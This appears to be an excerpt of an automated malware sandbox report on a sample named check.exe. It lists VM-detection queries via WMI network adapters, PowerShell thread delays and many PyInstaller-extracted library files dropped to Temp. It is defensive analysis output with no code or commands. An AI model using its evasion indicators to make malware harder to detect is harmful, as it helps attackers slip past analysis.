Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4317			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5413			Jump to behavior

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Svg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\QtWidgets.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\opengl32sw.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\QtWidgets.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\QtCore.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\libEGL.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\sip.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\platforms\qminimal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5WebSockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qsvg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qjpeg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\QtGui.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\platforms\qwindows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\platforms\qoffscreen.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\platforms\qwebgl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\QtCore.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qwbmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qico.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5Qml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qicns.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qtiff.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Quick.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5Network.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platforms\qwebgl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\opengl32sw.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platforms\qminimal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\sip.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qtiff.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qwebp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Network.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qwbmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5DBus.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qtga.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5Quick.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qjpeg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\QtCore.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5Qml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qgif.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qicns.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qico.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\iconusers\qsvgicon.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5QmlModels.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qwebp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platforms\qwindows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qjpeg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qicns.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\platforms\qminimal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\QtWidgets.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5QmlModels.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\iconusers\qsvgicon.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qtiff.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5DBus.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5Svg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\platforms\qoffscreen.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qgif.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\libEGL.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qico.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qwebp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\sip.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\QtGui.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qsvg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\libEGL.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5DBus.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5Network.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5QmlModels.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qwbmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\platforms\qwebgl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Qml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\platforms\qwindows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qgif.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qtga.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5Quick.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5WebSockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\QtGui.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platforms\qoffscreen.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qsvg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\d3dcompiler_47.dll	Jump to dropped file
